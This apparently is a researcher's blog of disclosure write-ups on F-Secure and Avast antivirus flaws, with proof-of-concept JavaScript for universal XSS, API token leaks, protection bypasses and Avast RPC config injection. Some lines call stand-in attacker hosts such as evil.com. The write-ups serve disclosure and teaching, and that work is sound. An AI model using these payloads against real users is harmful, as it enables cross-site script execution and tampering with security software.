Pwning your antivirus, part 3: the UXSS that wouldn't die

All right, time for another post in the series. This one's been in the works for a looong time; something like 9 months now. My previous post was about F-Secure SAFE for Mac, and this one picks up where that left off.

Information Leak in Browsing Protection APIs

I reported several bugs; here's the important part of the report I started with in January, an Information Leak in F-Secure SAFE for Windows:

The vulnerability in question is in the Browsing Protection FS_SERVICE API and can be reproduced as follows:

- Set up a web server to respond with a "200 OK" on
- Edit your Windows hosts file to include the following line: www.google.igi.tl
- Make sure Browsing Protection is enabled and the browser plugins installed.
- Go to http://www.google.igi.tl/ in Chrome. You should see the page served by your local web server.
- Open Chrome's dev console (Shift+Ctrl+J) and type the following: fs_prefix_rsc_url
- Hit enter, and you should see a URL containing a 32-character token.

The affected component, Browsing Protection, is basically a proxy that goes through your web traffic (non-TLS; TLS traffic is handled by a browser extension), blocks URLs known to be malicious, and injects some silly ranking code into search engine results pages. These injected code snippets access APIs that are protected with random 32-character authorization tokens.
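These injected snippets run in the page's own JavaScript context, so any script on the same page can read the globals they define. A minimal sketch of the resulting leak; the port and token value here are made up, and the variable name is the one that comes up again later in this post:

```javascript
// The injected Browsing Protection snippet defines a global whose value
// embeds the 32-character API authorization token (values hypothetical):
var fs_prefix_rsc_url = "http://localhost:8095/0123456789abcdef0123456789abcdef";

// Any script running on the same page can read the global and pull out
// the token with a simple regex:
var token = (fs_prefix_rsc_url.match(/[0-9a-f]{32}/) || [])[0];
// token now holds the secret guarding the FS_SERVICE APIs
```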

The idea, of course, was to point out that an authorization token could be accessed by a malicious origin, which would then gain access to the F-Secure Browsing Protection APIs. Editing your hosts file wasn't part of the issue or in any way relevant; the same could have been done with a real DNS record, I just skipped that bit to make testing easier. Which I pointed out clearly in the same email:

The local web server and the hosts file entry are both obviously just for testing. A real attacker would have a real web server and a domain name pointing to it. Any short 2nd level domain name will do, as long as you create a "google" subdomain.

Not really an interesting bug: the only use I could immediately find for the Browsing Protection APIs was enumerating a user's browser history. The response from F-Secure was exactly what you'd expect (emphasis mine):

With regards to the Information Leak through Browsing Protection for SAFE PC, our development team has investigated the issue and have concluded that it is not a vulnerability with Browsing Protection. We believe that if an attacker is able to modify the host file of a victim in the first place, there could be other methods to leak information rather than just through Browsing Protection. Having the ability to modify host file freely would also indicate that the machine has already been compromised using another method.


However if you are able to provide us a working PoC of leaking information about block page without modifying the host file, please do inform us for further investigation.

Ok, screw you: I own the domain I used in the example, so I'll just host a proper PoC there. Which I did. I also spent a few minutes figuring out what to do with the API access:

Here's a new and improved PoC for the information disclosure issue: http://www.google.igi.tl/anklfguoufgnnds/fsecure.html

I've hosted it on my web server, so no hosts file modification required. What the PoC does is trigger banking mode and then abuse the resulting block pages to find out your Facebook profile URL.

The PoC is still live at the original URL, so you can check out the source code there. With the click of a button it would work out the URL to your Facebook profile, as long as you were logged in. Is that a vulnerability yet?

After this new PoC, it took F-Secure a month to respond with anything other than boilerplate. That was to inform me that a fix had been released, only to let me know in the next email that (paraphrasing here) "sorry, no, nothing was actually released, it was an error". The actual release came another month later, in April, and even then it did nothing to restrict access to the sensitive APIs: all they did was rename the fs_prefix_rsc_url variable to x (which did nothing) and change the block page IDs to random hashes (which actually made the specific exploit impossible, but only that). This fix was released as a Network Interception Framework Update—whatever that is—version 2016-04-04_01.

Universal XSS in Browsing Protection

Concurrently with the Information Leak reports, I discovered and reported a Cross-Site Scripting issue in the very same Browsing Protection component in F-Secure SAFE for Windows. Here's an excerpt of another report I sent in January:

1) Host the following HTML document on a web server.
2) Open it in a Chrome instance with Browsing Protection enabled.
3) Click on the "Do it!" button.
4) Observe XSS on google.com.

    <script>
    window.addEventListener("message", function (event) {
        location.href = event.data.replace(/^http:\/\/localhost:\d+\//,
            'http://www.google.com/');
    });
    function doIt() {
        var w = window.open("https://kalantzis.net/#" +
            "';window.opener?" +
            "window.opener.postMessage(location.href,'*')" +
            ":alert('XSS\x20on\x20'+document.domain);'");
    }
    </script>
    <button onclick="doIt()">Do it!</button>

The HTML document above triggers XSS in the Browsing Protection block page, passes its URL back to the original script, then redirects to the same path on google.com, causing the same payload to be triggered there as well.

The PoC from above is also available here. The fun part in this one is of course that a simple XSS vulnerability in a Browsing Protection block page could be turned into Universal XSS and used against unsuspecting targets like Google, Facebook, and any online bank of your choice. It only worked in Chrome, but that was mainly because I was being lazy and didn't bother with other browsers.

The script warrants some explanation, as at first glance it might not be obvious how it worked.

Clicking the button would open a new browser window and attempt to load https://kalantzis.net/. This is a known malware domain picked from malwaredomainlist.com, which means the attempt to access it would be blocked by Browsing Protection. Now, because kalantzis.net is accessed over HTTPS, not HTTP, it would not be caught by the F-Secure proxy server (apparently called the Network Interception Framework); instead the interception would be handled by a browser extension. Due to technical limitations, the browser extension can't display a block page in-place on the same domain, and has to redirect to one on an HTTP server running on localhost.

So, in effect, the button would open a generated localhost URL, which could be used to uniquely reference the particular block page of the original HTTP request. This block page would display the original URL that was blocked, and the code to display that URL contained a simple XSS vulnerability. The payload in the PoC would read the URL of the block page and pass it back to the original script, which would then trigger navigation to the same URL—with one difference: it would replace localhost with google.com. The same block page would still open, because now it would be loaded from the F-Secure proxy server ("Network Interception Framework"). The same XSS payload would be run a second time, only now on a Google origin, this time triggering an alert dialog.

F-Secure quickly acknowledged the issue, but again it took a couple of months before they would even comment on a potential release date. A "fix" was released together with the fix to the Information Leak vulnerability, in the same Network Interception Framework Update version 2016-04-04_01.

At this point they also let me know that they had decided on a bounty of 100 EUR for the Information Leak, and 500 EUR for the UXSS.

Parental Control Bypass, Markup Injection, and Universal XSS on Android

A little bit after reporting the Information Leak and XSS issues on Windows, I moved on to the Android platform; specifically, F-Secure Mobile Security. This report is from February:

These have been tested on Android 5.1.1 with F-Secure Mobile Security 15.4.012621 FS_GP.

1) Trivial bypass of Parental Control in Safe Browser:
- Enable Parental Control and keep the default settings.
- Open Safe Browser and navigate to https://m.facebook.com/
- A block page appears; navigation is not allowed.
- Next, navigate to https://..@m.facebook.com/
- Navigation succeeds, and you should see the Facebook login page.

The trick is prepending "..@" to the URL. This seems to work reliably with all URLs and is very simple to do, so even your kids would be able to do it.
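My guess as to why the trick works, not confirmed by F-Secure: a spec-compliant URL parser treats everything before the "@" as userinfo and still resolves the real host, while a naive blacklist check that splits the URL up by hand sees something else entirely:

```javascript
// A spec-compliant parser resolves the real host despite the ".." userinfo,
// so the browser still navigates to Facebook:
var real = new URL("https://..@m.facebook.com/").hostname;
// real === "m.facebook.com"

// A naive check that takes the text between "://" and the first "/" or "@"
// as the host (hypothetical reconstruction) sees ".." instead, which never
// matches a blacklist entry:
function naiveHost(url) {
    return url.split("://")[1].split("/")[0].split("@")[0];
}
var checked = naiveHost("https://..@m.facebook.com/");
// checked === ".."
```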

Ok, not really interesting.

2) Markup injection in the block page in Safe Browser:
- Enable Parental Control as before.
- Open Safe Browser and navigate to: https://m.facebook.com/#<h1>markup</h1>
- Notice the "markup" header on the page.

The h1 tags are interpreted as HTML. This also works on the "non-Parental Control" block pages, i.e. malicious domains. In that case, Parental Control obviously doesn't have to be enabled. The output is filtered and no inline scripts or scripts from 3rd party origins are allowed. It would be possible to do content exfiltration using dangling img tags, but the page doesn't seem to contain anything sensitive after the URL. This still leaves phishing, injecting subversive messages and the like. However, bypassing the filter is possible in certain situations; see #3.
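For reference, the dangling img technique works by leaving an attribute quote unclosed, so the page content up to the next matching quote gets swallowed into the image URL and shipped off to the attacker's server when the browser fetches the image. A self-contained simulation; the domain and the "secret" are made up:

```javascript
// Injected fragment: an img tag with an unclosed src attribute
var injected = "<img src='https://evil.example/log?";
// Whatever markup the page happens to render after the injection point
var pageRest = "<p>secret-session-data</p>' onclick='...'";

// The HTML parser closes the attribute at the next single quote, so
// everything in between becomes part of the requested image URL:
var leakedUrl = (injected + pageRest).match(/src='([^']*)'/)[1];
// leakedUrl === "https://evil.example/log?<p>secret-session-data</p>"
```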

The app would let most HTML code through as-is, but filtered out anything that could have been used for XSS. Except when it came from the same origin.

3) XSS filter bypass using HTTP redirections, universal XSS:
- Enable Parental Control as before.
- Open Safe Browser and navigate to: https://platform.twitter.com/#<script src="https://platform.twitter.com/widgets.js"></script>
- You should see a normal block page with the URL "https://platform.twitter.com/#" displayed on it. However, the script injected after it doesn't get filtered. You can verify that by inspecting the source code of the page, or typing the following in the address bar: javascript:alert("__twttr" in window);

Now, being able to inject scripts hosted on the same origin isn't very useful, but consider this: what if the blocked service contains an open redirection vulnerability? E.g. if there was a URL like:

https://platform.twitter.com/vulnerable-page?returnto=https://some.other/url

...and that URL would return a HTTP 302 redirection. Now it would be possible to turn that into a more severe Cross-Site Scripting vulnerability like so:

https://platform.twitter.com/#<script src="https://platform.twitter.com/vulnerable-page?returnto=https://evil.com/malicious.js"></script>

Combine this with the Parental Control bypass from #1, and you'd be able to abuse it just like a regular XSS vulnerability.

The PoC wasn't perfect because the Parental Control feature would only be triggered on specific websites, and I obviously didn't have an open redirection on twitter.com to demo with. But it seemed to be enough to get the idea across, which is what I was hoping for. These were all rather minor issues, because they would have been very difficult to exploit.

I got no response at all from F-Secure for over a month. Not even the standard boilerplate. It wasn't until April that they finally reacted and let me know they were working on it.

The first fix came out in June. F-Secure told me they had fixed all three issues; however, only the first one was fixed. Both the Markup Injection and UXSS issues were reproducible in their original form. I reported this back to them, and an actual fix for those two came out in September.

Bypassing the UXSS fix on Windows

After F-Secure's first attempt at fixing the UXSS vulnerability on Windows, I quickly submitted a bypass. The PoC code is live here, and as you can see, doesn't differ much from the original:

    <script>
    function doIt() {
        var w = window.open("https://kalantzis.net/" +
            "';if(document.domain==='localhost')" +
            "location.href=location.href.replace(/localhost:[0-9]+/,'www.google.com');" +
            "alert(document.domain);'");
    }
    </script>
    <button onclick="doIt()">Do it!</button>

The biggest difference is that the injection is now in a slightly different part of the URL, as the original fix was to not include URL fragments in the block page. Instead of, say, escaping stuff properly, which is what a sensible person would do.

A couple of days later, before F-Secure really even had time to react to this one, I submitted a third PoC for the same UXSS vulnerability. This was for two reasons. Firstly, the second PoC still didn't work on Firefox, but more importantly, I also wanted to demonstrate that the fix F-Secure had implemented for the Information Leak vulnerability was not sufficient.

The third UXSS PoC is here, and the way it worked was a bit different:

    <html>
    <head>
    <script>
    function xss() {
        var payload = "alert('XSS on ' + document.domain)";
        var target = "www.google.com";
        var xhr = new XMLHttpRequest();
        xhr.open("POST", x /* fs_prefix_rsc_url */ + "/httpsscan", false);
        xhr.send(JSON.stringify({
            "url": "http://kalantzis.net/</scr" + "ipt><scr" + "ipt>" +
                payload + "</scr" + "ipt>",
            "rqtype": 1
        }));
        location.href = JSON.parse(xhr.responseText)
            .redirect.replace(document.domain, target);
    }
    </script>
    </head>
    <body onload="xss()"></body>
    </html>

This PoC would directly access the same APIs that were exploited in the Information Leak PoCs. It would query the API for a block page URL, then redirect to that path on the target origin, fetching the vulnerable page from the F-Secure proxy server. Because the block page URL was passed in a JSON message and not through the URL bar, this would work equally well in all browsers.

This time the initial response from F-Secure was quick, and again they acknowledged the issue. Another three months of waiting followed, after which they pushed out another patch, F-Secure Network Interception Framework Update 2016-07-18_01. Literally 10 minutes of testing later, I countered with the fourth PoC:

    <html>
    <head>
    <script>
    function xss() {
        var payload = "alert(&apos;XSS&nbsp;on&nbsp;&apos;+document.domain)";
        var target = "www.google.com";
        var xhr = new XMLHttpRequest();
        xhr.open("POST", fs_prefix_rsc_url + "/httpsscan", false);
        xhr.send(JSON.stringify({
            "url": "http://kalantzis.net/&lt;/scr" + "ipt&gt;&lt;iframe" +
                "/src=&quot;javascript:" + payload + "&quot;&gt;",
            "rqtype": 1
        }));
        location.href = JSON.parse(xhr.responseText)
            .redirect.replace(document.domain, target);
    }
    </script>
    </head>
    <body onload="xss()"></body>
    </html>

Can you spot the difference? Two things changed compared to the third PoC: the payload is now escaped using HTML entities, and the variable used to access the F-Secure APIs has been renamed back to the original fs_prefix_rsc_url. Basically zero effort from F-Secure. At this point it had already been half a year since I initially reported the issue, so I started getting a bit tired and decided to set a deadline:

Starting from this moment, I'm giving you 60 days to implement and release a proper fix for the UXSS vulnerability on Windows. At the end of September I'm going to publish the details, regardless of whether you've managed to fix it or not. This is to motivate you to actually take this seriously, and the 60 days should be *plenty*, especially for something you've already worked on for this long.

Now, since it seems you can't figure it out on your own, here's how you fix an XSS vulnerability:

Step 1: Use context-aware escaping everywhere, on all untrusted input.
Step 2: There is no step 2.

This is the only way to do it. If you figure out some other way to do it, it is not actually a good way to do it. Do not do it any other way. You should have some in-house web application security expertise, so please put that into use. Get some of those people working on your QA.
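For the record, "context-aware escaping" just means picking an encoder that matches the output context the untrusted data lands in. A minimal sketch of the two encoders relevant to these block pages, HTML element content and single-quoted JavaScript strings; the function names and implementations are mine, not F-Secure's:

```javascript
// Escape untrusted text for an HTML element content context
function escapeHtml(s) {
    return String(s).replace(/[&<>"']/g, function (c) {
        return "&#" + c.charCodeAt(0) + ";";
    });
}

// Escape untrusted text for a single-quoted JS string literal, the context
// the block-page payloads above were injected into
function escapeJsString(s) {
    return String(s).replace(/[^\w .\-]/g, function (c) {
        return "\\u" + ("0000" + c.charCodeAt(0).toString(16)).slice(-4);
    });
}
```

Run the blocked URL through the matching encoder at every point where it's written into the page, and injections like ';alert(1);' come out as inert text instead of code.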

And hey, results! The initial response was surprisingly positive, and about a month later they got back to me with something that actually sounded promising:

We have had our in-house software security experts working with the development team to fix the root cause of the issue. At the moment, the team has fixed the cause of UXSS and is currently still doing some improvements to the block page. We aim to have a new database release in 3 weeks (possibly the week of 12th September as it is going through the normal release and testing process).

And finally, another month later, a week before the deadline in September:

We would like to inform you that a new database of F-Secure Network Interception Framework has been released yesterday with the version 2016-09-20_01. With that database release, the fix for UXSS is in place along with some additional improvements to the block page. We would like you to kindly update the product database and verify the fixes that we deployed.

And yes, now they got it right! The deadline did wonders :)


The final fix for the UXSS was included in F-Secure Network Interception Framework database update version 2016-09-20_01. F-Secure decided not to release any advisories for any of the issues mentioned above.

In October F-Secure got back to me with some new decisions regarding bounties: 550 EUR for the vulnerabilities in F-Secure Mobile Security, and 1500 EUR for the UXSS, in addition to the 600 EUR already paid. That makes for a total of 2650 EUR for UXSS and a bunch of minor issues on two platforms.


Pwning your antivirus, part 2: even your Mac isn't SAFE

TL;DR F-Secure has patched multiple vulnerabilities in their SAFE for Mac antivirus product. The official advisory can be found here. As usual, this post focuses on the technical details from a bug hunter's perspective.

Poking around antivirus products is fun, mainly because they seem to be so terribly broken. So continuing with the theme from my last blog post, this time I looked at F-Secure SAFE for Mac, the consumer antivirus product from Finnish F-Secure, specifically the Browsing Protection component. As you can tell from the timeline at the end of this post, I actually started with this before I looked at Avast!, but this time no one else had beaten me to it, meaning getting everything fixed took a little bit longer.

Yeah, sure, the title might be exaggerating a bit. I just can't resist a good pun. If your auto-updates are working (mine actually weren't on one machine, or they might have been just a bit slow to propagate), you're totally safe. Even if you haven't got the update, none of the issues were all that bad in the end. The number of them and a few interesting features made it enough to warrant a blog post, though.

And yeah, "multiple issues" is always good.

Issue #1: Trivially triggering banking protection on non-banking websites.

The Browsing and Banking Protection features in F-Secure SAFE for Mac are implemented as a browser extension that interfaces with the native app using both nativeMessaging and a custom HTTP server running on localhost. I was looking specifically at the Chrome extension.

The extension listens to traffic using Chrome's webRequest APIs and reacts to different URLs based on a classification from F-Secure. In the case of Banking Protection, the software attempts to recognize online banks and then triggers a notification to tell the user they're on a trusted website and can safely go on with their business.

The thing is, when you're doing something like that, you want to make sure you're actually parsing URLs correctly. It can be surprisingly difficult sometimes.

So what about a URL like this one:

http://op.fi%2f@example.com/

That's obviously pointing to example.com, only it has some cruft in the beginning. Well, op.fi is a Finnish bank, and %2f is the URL encoding for /. F-Secure SAFE was parsing the URL like so:

http://op.fi/@example.com/
So op.fi is now the domain part and /@example.com/ the path. A tiny little mistake, but it meant Banking Protection would be triggered when visiting the link that's actually pointing to example.com.
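The difference between the two interpretations is easy to demonstrate. The naive parser below is my reconstruction of the flawed behavior, not F-Secure's actual code:

```javascript
// A spec-compliant parser keeps %2f encoded, treats "op.fi%2f" as userinfo,
// and resolves the real host:
var real = new URL("http://op.fi%2f@example.com/").hostname;
// real === "example.com"

// A parser that percent-decodes first and then splits at the first "/"
// gets it backwards (hypothetical reconstruction):
function naiveHost(url) {
    return decodeURIComponent(url).split("://")[1].split("/")[0];
}
var wrong = naiveHost("http://op.fi%2f@example.com/");
// wrong === "op.fi", which is why Banking Protection saw a Finnish bank
```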

Issue #2: Trivially bypassing Browsing Protection.

Browsing Protection in F-Secure SAFE works basically the same way as Banking Protection, only the other way around. The extension looks at the URL you're trying to browse to, then compares it to a blacklist, and blocks access if the URL is known to be malicious or otherwise not cool.

The idea is the same as in triggering the banking notification, and so shouldn't need much explanation:

http://x%2f@kalantzis.net/
kalantzis.net is a malware domain picked at random from Malware Domain List, and would normally trigger Browsing Protection. With x%2f@ at the beginning of the URL, however, the URL would be parsed incorrectly by F-Secure SAFE, and the Browsing Protection completely bypassed. The x part in the beginning didn't even have to be a real domain, just a single alphanumeric character would do.

Issue #3: Clickjacking.

Okay, this is a boring one. The Browsing Protection block page, served from the localhost HTTP server, had a button on it to allow whitelisting a blocked page. But it didn't implement any clickjacking protections, no X-Frame-Options, no framebusters. It would have been possible to embed the block page in a frame and trick someone into whitelisting pages.
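The standard defenses are the X-Frame-Options: DENY response header or, as a fallback, a script-based frame buster. A minimal sketch of the latter; the check is factored into a function here purely so it can be exercised outside a browser:

```javascript
// True when the page is being displayed inside a frame
function isFramed(win) {
    return win.top !== win.self;
}

// In a browser, the block page would then break out of any frame:
//   if (isFramed(window)) window.top.location = window.self.location;
```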

Issue #4: UI spoofing in the whitelisting confirmation dialog.

When whitelisting a page by clicking the button on the Browsing Protection block page, F-Secure SAFE would display a native dialog window with an F-Secure logo and a confirmation message asking whether you're really sure. As part of that confirmation message, the URL about to be whitelisted would be displayed. The issue was with the software making no effort to encode whitespace characters in the URL or to differentiate the URL from the static message. So take for example the following URL:

Triggering a whitelisting dialog for that URL, for example through clickjacking, would result in the following message being displayed in the native popup:
     ____________________________________________________________________
    |                                                                    |
    |  Do you want to allow access to the following web address?         |
    |  (F)                                                               |
    |      https://f-secure.com                                          |
    |                                                                    |
    |      Trust me. It's totally legit.                                 |
    |                                                                    |
    |              Allow            Don't allow                          |
    |____________________________________________________________________|
The actual domain, kalantzis.net, would be pushed beyond the bottom edge of the dialog, with no way for the user to see it.

Issue #5: Bad practices, unsafe use of DOM APIs, almost useless authentication mechanism.

Finally, there was some terribly fragile code and bad practices in use throughout the software. There were no direct vulnerabilities caused by these as such, but apparently they still played a major part when determining the size of the bounty.

The bad practices included things like abundant use of innerHTML in JavaScript code, and some input sanitization that was just a bit iffy, but most worrying was probably the way the extension authenticated itself to the localhost HTTP server. There was a token named cookie (but not an actual HTTP cookie), obtained via nativeMessaging, which was passed to the HTTP server to authenticate requests. The problem: the "cookie" was only 8 hexadecimal digits long. That's the same as 4 bytes, or a single 32-bit integer. Not a terribly difficult secret to guess.
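To put the size of that secret in perspective, a quick back-of-the-envelope calculation; the request rate is an assumption, but localhost round-trips are fast:

```javascript
// 8 hex digits = 32 bits of entropy
var space = Math.pow(16, 8);            // 4294967296 possible tokens
var perSecond = 10000;                  // assumed request rate against localhost
var days = space / perSecond / 86400;   // roughly 5 days to try them all
```

On average the token would fall in half that time, and a faster client shrinks it further.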


The Browsing Protection bypass and Banking Protection spoof were fixed with a small change to the URL parsing. To protect against clickjacking, some frame busting code was added. The UI spoof was fixed by disallowing unusual characters in the displayed URL, and the bad practices and miscellaneous issues were addressed as well, including the short authentication token, whose length was increased significantly.

F-Secure decided to pay me a bounty of 1000 EUR, citing especially my pointing out the quality issues and fragile API as a factor that increased the bounty.



Timeline:

2016-01-12 > Initial report
2016-01-14 < Reply from F-Secure; investigating
2016-01-20 < New release planned, ETA 6 weeks
2016-03-21 > Request for a status update
2016-04-04 < Fixes in testing, release within 2 weeks
2016-04-08 < Fixes released on 2016-04-07; decision to pay a bounty of 1000 EUR
2016-04-19 > Verified the fix, asked about going public
2016-04-19 < Advisory planned for 2016-04-26, ok to publish details once it's out
2016-04-21 < Advisory pushed forward to 2016-05-03 due to "circumstances"
2016-05-03 < Advisory published as FSC-2016-1


Pwning your antivirus, part 1: fun with Avast! RPC calls

Just yesterday, Tavis Ormandy from Google's Project Zero published some interesting findings he'd made in Avast antivirus. He had spotted an open RPC endpoint in one of the services and was able to figure out how to use it to launch the "Avastium" browser, an Avast fork of Chromium. He then went on to build an exploit for the browser, ending up with read access to the local filesystem.

This post is not about Tavis' findings. They're just a funny coincidence--if you can call a serious security issue funny. No, this post is about a closely related finding I made myself a couple of weeks ago, right before Avast released a fix for it; or rather, a fix for the issues Tavis had identified, which also happened to fix this one.


If you've read my blog before, or otherwise know me, you'll know that I like to do a bit of hacking now and then. About two weeks ago I had the idea of making Avast's free antivirus software my next target. I noticed they had a bug bounty program, so if I actually found something, it'd be a total win-win. I grabbed the installer, set up the default installation, and started poking around.

I started by going through as much of the basic functionality as possible and mapping out an attack surface. I noticed Avast had a Chrome extension for things like content filtering and web reputation features. That became a natural starting point for my first attempt: I've written Chrome extensions myself, so I'm familiar with the APIs and tools, and since they are mainly built with JavaScript and HTML, there's no need to break out IDA Pro right away.

Reading the code and observing network traffic, I quickly spotted a web server running on localhost:27275. It was used for passing data between the extension and the native "back-end" services. The protocol was some kind of a binary format wrapped in HTTP; as it turns out from Tavis' research, the exact format was binary protobuf. I didn't bother figuring out the exact protocol, as I found the content of the messages more interesting. I was seeing two types of messages:

Both were sent as POST requests to http://localhost:27275/command. The former seemed to just contain some kind of version information, and didn't appear very interesting. The latter, however, was very promising. I reversed the protocol enough to figure out that the first four bytes of the message contained a byte indicating an RPC command (position 0x01) and another indicating the length of the string parameter (position 0x03). The bytes at positions 0x00 and 0x02 seemed to be constant, as did the two bytes at the end of the message.
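Based on that layout, the framing can be captured in a small helper. The constant byte values (0x08, 0x12, and the trailing 0x18 0x03) and the 0x0e command byte are the ones visible in the PoC further down; note that the single length byte caps the parameter at 255 characters:

```javascript
// Frame an RPC message: constant byte at 0x00, command byte at 0x01,
// constant byte at 0x02, parameter length at 0x03, then the parameter
// bytes followed by two constant trailing bytes
function buildRpcMessage(command, param) {
    var bytes = param.split("").map(function (c) {
        return c.charCodeAt(0);
    });
    return new Uint8Array(
        [0x08, command, 0x12, bytes.length].concat(bytes, [0x18, 0x03])
    );
}

// e.g. buildRpcMessage(0x0e, "avastcfg://avast5/Common/PropertyDataSharing=1")
```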

This is where my findings start to differ from the ones Tavis made: he apparently decided to enumerate all the possible RPC commands to see if there was anything else available, whereas I immediately had my eye on the avastcfg:// part. I mean, it's some kind of a URI for accessing--and editing--the configuration of your antivirus software. There has to be something nasty you can do with it!

Turned out there wasn't. I looked up some configuration options and tried changing them via an RPC call, but none of it worked. The calls were being validated in the native code, and only changing that one property was allowed. And the property being something about sharing data with Avast, it wasn't very interesting.

There was something interesting though: even though the name of the configuration property was being validated, the value wasn't! I was able to set avastcfg://avast5/Common/PropertyDataSharing=foo, then query for the value, and get foo back! Still not much, though, as long as the value was handled otherwise correctly.

I remembered seeing an option earlier for exporting your Avast configuration to a file. Maybe I could get an invalid PropertyDataSharing value exported to a file, and then trigger something when the same file was imported back to Avast. Getting a bit complicated and hard to exploit, I know, but it's still something. I figured I'd have a go.

The Avast export format is a .zip archive with a bunch of .ini configuration files in it. And as I'd thought, the PropertyDataSharing value was stored inside one of them, even when it was set to something bogus. Now, what would happen if I injected a newline into the value?

Success! Newlines weren't being encoded or escaped in any way inside .ini files. I was able to set arbitrary properties in the exported configs, and importing them back to Avast worked too! It was still pretty difficult to exploit, though.
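The mechanics are simple enough to show in a few lines. This simulates the flawed serialization; it is not Avast's actual code, and the injected NetAlert property is the same one used in the PoC below:

```javascript
// A writer that drops an unescaped value straight into an .ini line:
function writeIniLine(key, value) {
    return key + "=" + value + "\r\n";
}

// An attacker-controlled value containing a CRLF smuggles in a second line:
var crafted = "0\r\nNetAlert=SMTP:attacker@example.com";
var output = writeIniLine("PropertyDataSharing", crafted);

// Anything reading the file back sees two separate settings:
var lines = output.split("\r\n").filter(Boolean);
// lines[0] === "PropertyDataSharing=0"
// lines[1] === "NetAlert=SMTP:attacker@example.com"
```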

After I'd exported and imported some crafted values a couple of times in a row, I noticed something strange: some of the configuration settings I'd injected started to appear in the exported file way more times in a row than they should have. It was like the import wasn't the only phase where they got injected. In fact, exporting and importing the configuration wasn't necessary at all! Apparently Avast was using the same .ini format internally, and had the same issue there! So now I was able to change arbitrary settings in Avast simply by handing the victim a malicious link. All that was left was building a nice PoC that would handle it automatically:

    <script>
    var payload = "NetAlert=SMTP:attacker@example.com";
    var url = "http://localhost:27275/command";

    var message = "avastcfg://avast5/Common/PropertyDataSharing=0" +
        "\r\n" + payload;
    message = message.split("").map(function (s) {
        return s.charCodeAt(0);
    });
    message = [ 0x08, 0x0e, 0x12, message.length ].concat(message);
    message = message.concat([ 0x18, 0x03 ]);
    message = new Uint8Array(message);

    var xhr = new XMLHttpRequest();
    xhr.open("POST", url, false);
    xhr.send(message);
    </script>

The script above makes a cross-origin XMLHttpRequest to the RPC endpoint and configures an SMTP alert. Changing the payload, it should be possible to do pretty much anything you can from the Avast UI. Pretty neat, huh?

I reached out to Avast with the PoC, and quickly got a reply. They stated they were aware that the localhost HTTP server has issues; someone (Tavis) had reported a similar vulnerability in December. A fix was already planned and ready, and a release scheduled for about a week from then! Easily the quickest reaction from a vendor I've ever seen, even if they did have a head start!

Even though they were already aware of the issues with the RPC endpoint, the newline injection part was new to them. They decided on a $2000 bounty, which is not bad at all for an evening of messing around with some HTTP APIs. All in all, the response was great, and the issue is now fixed. If you're running Avast, I suggest installing the update ASAP.


Timeline:

2016-01-24 > Initial report
2016-01-26 < Acknowledgement from Avast; related issue reported in December, already fixed
2016-01-26 > Clarified that the issue is currently exploitable in the latest release
2016-01-26 < Confirmation that the fix has not been released yet
2016-02-02 < Decision to pay a bounty of $2000
2016-02-03 > Request for a status update on the fix
2016-02-04 < Issue fixed, ok to publish details


Publishing server-side code with Git and Bitbucket

As a security researcher with a background in software development, I write lots and lots of code. Most of it takes the form of small and fairly short-lived scripts: proofs-of-concept, quick demos, and highly specific single-purpose tools. And with my platform of choice being the web, I often need to host that code somewhere. Sometimes localhost might be enough, but if I want to show my demo to someone else, it won't do. And for some things you just need a public URL for them to work.

With client-side code, I might head for JSFiddle or CodePen, especially if all I need is to share a demo with someone on the other side of the planet. But both of them are pretty terrible if you need to do anything even slightly more complicated, and they quickly become unusable if your code is actually designed to break things. Iframes tend to interfere with demo code, CodePen likes to update pages automatically, which breaks things, and you just can't use JSFiddle at all on mobile. For some types of things they're fine, though.

For my larger projects' source code repositories my choice has for a while now been Bitbucket, simply because they give you an unlimited number of private repositories for free. I like Git, but the thing with Bitbucket is, it's just for source code.

Well, actually, it's not. You can also host static websites on Bitbucket, just like you can on GitHub Pages. That's already way better than using one of the JavaScript playground websites: you get to use your own code editor, can publish with a simple git push, and as a bonus, automatically get a changelog of everything you do. But it still won't run server-side code, and Bitbucket also injects analytics JavaScript into your HTML pages, which is just as bad as all the iframe stuff on the playground websites.

If you want to run server-side code, really the only choice is getting proper web hosting.

I've had cheap PHP hosting for a while already, but I never really put it to any use. Previously I had a static website in place of this blog and used the hosting for that. I would have used it to host my code snippets too, except for one issue: uploading stuff was a serious pain. The archaic web UI, seemingly from some time before the era of Web 1.0 (possibly written by the same people who brought us the 1994 version of Microsoft.com), was the worst piece of UX I've ever come across. If only there were a better way.

If only I could sync my Bitbucket repo with the web hosting service.

Turns out Bitbucket has a pretty decent API. Basically every single piece of data is behind a simple HTTP request, from repository details to SSH keys to user account details. Authentication is done with either OAuth or HTTP Basic, and public data can be accessed with no authentication at all. Multiple response formats. No special API keys or any other weirdness required.

My need was extremely simple, and after a quick search through the API methods I had exactly what I wanted:

GET repositories/{accountname}/{repo_slug}/src/{revision}/{path}
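The request is simple enough to build by hand; HTTP Basic authentication is just a base64-encoded header. A quick sketch in JavaScript (the account, repo, and path names below are made up for illustration):

```javascript
// Build the Authorization header for HTTP Basic auth:
// "Basic " + base64("user:pass")
function authHeader(user, pass) {
  return "Basic " + Buffer.from(user + ":" + pass).toString("base64");
}

// Build the URL for the src endpoint shown above; revision defaults to master
function srcUrl(account, repo, path, revision) {
  revision = revision || "master";
  return "https://bitbucket.org/api/1.0/repositories/" +
    account + "/" + repo + "/src/" + revision + "/" + path;
}

// GET this URL with the Authorization header set and you get the file back
console.log(srcUrl("someuser", "lab", "demo/index.html"));
// → https://bitbucket.org/api/1.0/repositories/someuser/lab/src/master/demo/index.html
console.log(authHeader("someuser", "secret"));
```

A plain curl with -u user:pass against the same URL does the job just as well.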

To keep things simple I decided to go with HTTP Basic authentication. I created a new repository and a fresh Bitbucket account to use with the API, and gave the new account read-only access to the repo. After that, all that was left was setting up a subdomain for the site and typing out a few lines of PHP.

I used mod_rewrite to map request paths to a GET parameter. Then, after a couple of lines of input validation, the API call:

$response = file_get_contents("https://$USER:$PASS@bitbucket.org/api/1.0/repositories/$REPO/src/master/$path");
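The mod_rewrite part mentioned above might look something like this (a guess at the configuration, not my actual .htaccess):

```apache
RewriteEngine On
# Hand every request path to index.php as a "path" GET parameter
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php?path=$1 [L,QSA]
```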

Parse the response, map the file extension to a MIME type, add some simple caching, and voilà! All in no more than 65 lines of code. The result can be seen at lab.igi.tl. There's not much there right now, of course, but in the future it'll become the home for a whole lot of interesting code snippets.
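The remaining glue, path validation and MIME mapping, is only a few lines. Here's a rough sketch in JavaScript rather than the original PHP; the validation rule and the MIME table are my guesses, not the actual code:

```javascript
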